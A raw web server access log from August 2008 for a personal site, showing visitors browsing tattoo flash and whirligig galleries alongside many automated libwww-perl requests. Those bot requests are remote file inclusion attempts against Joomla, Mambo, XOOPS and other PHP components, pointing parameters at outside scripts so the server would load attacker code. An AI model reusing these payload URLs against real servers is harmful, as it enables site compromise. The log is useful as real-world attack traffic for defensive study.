97.90.57.179 - - [06/Aug/2008:21:13:04 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:04 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:04 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:04 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:04 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:04 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:04 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:04 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:04 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:05 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:15 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:15 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:15 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:15 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:15 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:15 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:15 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:15 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:15 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:15 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:16 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
210.127.253.161 - - [06/Aug/2008:21:13:29 -0500] "GET /logs/access_log.1213142400/errors.php?error=http://www.objectsworld.net/dotproject//includes/r0x.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
97.90.57.179 - - [06/Aug/2008:21:13:30 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:30 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:30 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:30 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:30 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:30 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:30 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:30 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:30 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:30 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:30 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
210.127.253.161 - - [06/Aug/2008:21:13:32 -0500] "GET /logs/access_log.1213315200/errors.php?error=http://www.objectsworld.net/dotproject//includes/r0x.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
97.90.57.179 - - [06/Aug/2008:21:13:44 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1762 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:44 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:44 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:44 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:44 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:44 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:44 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:44 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:44 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:44 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
97.90.57.179 - - [06/Aug/2008:21:13:44 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)"
64.22.100.83 - - [06/Aug/2008:21:14:19 -0500] "GET /logs/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.813"
64.22.100.83 - - [06/Aug/2008:21:14:19 -0500] "GET /errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.813"
64.22.100.83 - - [06/Aug/2008:21:14:41 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 94316 "-""libwww-perl/5.813"
64.22.100.83 - - [06/Aug/2008:21:14:41 -0500] "GET //?path%5Bdocroot%5D=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.813"
218.38.12.93 - - [06/Aug/2008:21:14:56 -0500] "GET /logs/errors.php?error=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
218.38.12.93 - - [06/Aug/2008:21:14:56 -0500] "GET /errors.php?error=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
218.38.12.93 - - [06/Aug/2008:21:14:56 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
218.38.12.93 - - [06/Aug/2008:21:14:57 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
67.15.181.24 - - [06/Aug/2008:21:18:35 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://sujianto.com/id.txt?%0D?? HTTP/1.1" 404 314 "-""libwww-perl/5.808"
67.15.181.24 - - [06/Aug/2008:21:18:35 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://sujianto.com/id.txt?%0D?? HTTP/1.1" 404 309 "-""libwww-perl/5.808"
166.217.52.131 - - [06/Aug/2008:21:20:04 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Tattoo_flash""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
166.217.52.131 - - [06/Aug/2008:21:20:05 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
166.217.52.131 - - [06/Aug/2008:21:20:05 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
166.217.52.131 - - [06/Aug/2008:21:20:16 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
84.22.143.171 - - [06/Aug/2008:21:20:38 -0500] "GET /logs/access_log.1206230400///vwar/backup/errors.php?error=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.75"
64.26.63.13 - - [06/Aug/2008:21:22:12 -0500] "GET /logs//login.php?dir=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
64.26.63.13 - - [06/Aug/2008:21:22:12 -0500] "GET //login.php?dir=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
69.13.27.210 - - [06/Aug/2008:21:23:19 -0500] "GET //skin/zero_vote/error.php?dir=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
216.14.123.10 - - [06/Aug/2008:21:24:30 -0500] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://artworkmarket.com/components/rey? HTTP/1.1" 404 337 "-""libwww-perl/5.65"
216.14.123.10 - - [06/Aug/2008:21:24:30 -0500] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://artworkmarket.com/components/rey? HTTP/1.1" 404 332 "-""libwww-perl/5.65"
77.90.20.2 - - [06/Aug/2008:21:24:39 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
77.90.20.2 - - [06/Aug/2008:21:24:39 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
66.79.163.110 - - [06/Aug/2008:21:25:00 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
66.79.163.110 - - [06/Aug/2008:21:25:01 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
147.202.40.223 - - [06/Aug/2008:21:25:32 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 356 "-""libwww-perl/5.814"
147.202.40.223 - - [06/Aug/2008:21:25:33 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 351 "-""libwww-perl/5.814"
207.69.137.39 - - [06/Aug/2008:21:26:22 -0500] "GET /artwork/whirligigs.htm HTTP/1.1" 200 985 "http://search.msn.com/images/results.aspx?q=whirligigs&FORM=MSNH&mkt=en-US""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; PeoplePal 7.0) w:PACBHO60"
207.69.137.39 - - [06/Aug/2008:21:26:23 -0500] "GET /artwork/unclesamwhilrligig.jpg HTTP/1.1" 200 59934 "http://tomdolan.pconline.com/artwork/whirligigs.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; PeoplePal 7.0) w:PACBHO60"
207.69.137.39 - - [06/Aug/2008:21:26:23 -0500] "GET /artwork/shootingfishinabarrel.png HTTP/1.1" 200 55770 "http://tomdolan.pconline.com/artwork/whirligigs.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; PeoplePal 7.0) w:PACBHO60"
207.69.137.39 - - [06/Aug/2008:21:26:23 -0500] "GET /artwork/LA%27s-finest.png HTTP/1.1" 200 56425 "http://tomdolan.pconline.com/artwork/whirligigs.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; PeoplePal 7.0) w:PACBHO60"
64.26.63.13 - - [06/Aug/2008:21:26:30 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
64.26.63.13 - - [06/Aug/2008:21:26:30 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
200.49.100.20 - - [06/Aug/2008:21:27:15 -0500] "GET /errors.php?error=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
200.49.100.20 - - [06/Aug/2008:21:27:15 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
200.49.100.20 - - [06/Aug/2008:21:27:15 -0500] "GET /logs/errors.php?error=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
218.38.12.93 - - [06/Aug/2008:21:27:55 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
218.38.12.93 - - [06/Aug/2008:21:27:55 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
87.118.98.141 - - [06/Aug/2008:21:28:09 -0500] "GET /logs/formmail.inc.php?script_root=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
87.118.98.141 - - [06/Aug/2008:21:28:11 -0500] "GET /formmail.inc.php?script_root=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
212.92.23.89 - - [06/Aug/2008:21:28:24 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.superchristensen.com/images/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
200.49.100.20 - - [06/Aug/2008:21:28:31 -0500] "GET /logs/access_log.1212192000/errors.php?error=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
92.56.99.197 - - [06/Aug/2008:21:28:38 -0500] "GET /logs/access_log.1208044800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
92.56.99.197 - - [06/Aug/2008:21:28:38 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
92.56.99.197 - - [06/Aug/2008:21:28:39 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
216.14.123.10 - - [06/Aug/2008:21:29:36 -0500] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://artworkmarket.com/components/rey? HTTP/1.1" 404 337 "-""libwww-perl/5.65"
216.14.123.10 - - [06/Aug/2008:21:29:37 -0500] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://artworkmarket.com/components/rey? HTTP/1.1" 404 332 "-""libwww-perl/5.65"
147.202.40.223 - - [06/Aug/2008:21:30:06 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.814"
147.202.40.223 - - [06/Aug/2008:21:30:06 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.814"
69.13.27.210 - - [06/Aug/2008:21:31:50 -0500] "GET /logs/access_log.1203638400//skin/zero_vote/error.php?dir=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
69.13.27.210 - - [06/Aug/2008:21:31:50 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
69.13.27.210 - - [06/Aug/2008:21:31:53 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/error.php?dir=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
92.56.99.197 - - [06/Aug/2008:21:32:01 -0500] "GET /logs/access_log.1208044800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
92.56.99.197 - - [06/Aug/2008:21:32:02 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
92.56.99.197 - - [06/Aug/2008:21:32:02 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
213.91.246.64 - - [06/Aug/2008:21:33:17 -0500] "GET /components/com_mambowiki/MamboLogin.php?IP=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
193.253.223.90 - - [06/Aug/2008:21:33:46 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
193.253.223.90 - - [06/Aug/2008:21:33:46 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
193.253.223.90 - - [06/Aug/2008:21:33:46 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
193.253.223.90 - - [06/Aug/2008:21:33:47 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
209.25.195.243 - - [06/Aug/2008:21:34:17 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
209.25.195.243 - - [06/Aug/2008:21:34:17 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
